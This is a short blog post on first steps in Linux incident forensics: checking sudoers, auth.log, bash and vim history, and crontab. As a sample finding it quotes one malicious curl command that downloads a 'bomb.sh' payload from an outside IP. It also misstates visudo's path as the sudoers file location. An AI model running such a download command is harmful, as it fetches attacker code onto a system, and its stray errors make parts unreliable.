Incident Forensics - Kali Linux Tips

Paulo Bazzo

What are the first steps ?

We are going over some of the first few things you should check when examining a computer for traces an attacker might have forgotten to hide. After all, there is no perfect crime.

Edit the Sudoer files

The file that will keep all the information about the SUDOERS. This command provides basic sanity checks, and checks for parse errors. If the sudoers file is currently being edited you will receive a message to try again later

Sudoers File Location

/usr/sbin/visudo                  

Checking .log files

We can perform an indepth search on the system by examining the auth.log file. This fill will keep track of all the commands that were used during a session, and applications that were open. Its a good place to start when doing a foresncics analysis on a machine.

cat /var/log/auth.log*

Use the Grep command to select specific lines of the file.

cat /var/log/auth.log* | grep -i COMMAND

Using the grep we are asking to find lines that have the word "COMMAND" on it. The -i flag is to make it non case sensitive. It's also a good idea to search for executables that were open like .sh, .py, .php files

Check the Command History

Every user has a .bash_history file inside their home directory, use this file to investigate commands that were used by the user. Sometimes an individual might compromised more than one account,so we should be mindful that he could download a payload with account X and execute the payload with account Y

On this example this is the command we have found to be malicous on our analysis

curl 10.10.158.38:8080/bomb.sh --output bomb.sh

The command above we are going to the speficif file location that is being hosted by IP address Using port 8080 to connect Downloading the file using --output

Vim History

Vim is the text editor that we can use from inside the Linux terminal, it also hold historical information that can be useful when doing an incident forensics. Check the following file, usually located inside the home directory of the user. At the top of the file there will be information on where the file was saved.

.viminfo

Scheduled Tasks

alicious file will often be stored to be executed as an schedulled task. We can run the following to check all schedulled tasks on the system.

cat /etc/crontab

To understant the hour and time that the job will be executed we can use a website like Crontab.guru to help translate to human format the date/hour the crontab job was schedulled the HOUR:MINUTE

Summary

ON this blog we went throught some of the first steps we could take when examing a potential compromised machine.
This blog post will be update periodically with more information, and will be used as a repository for information and quick access of short codes.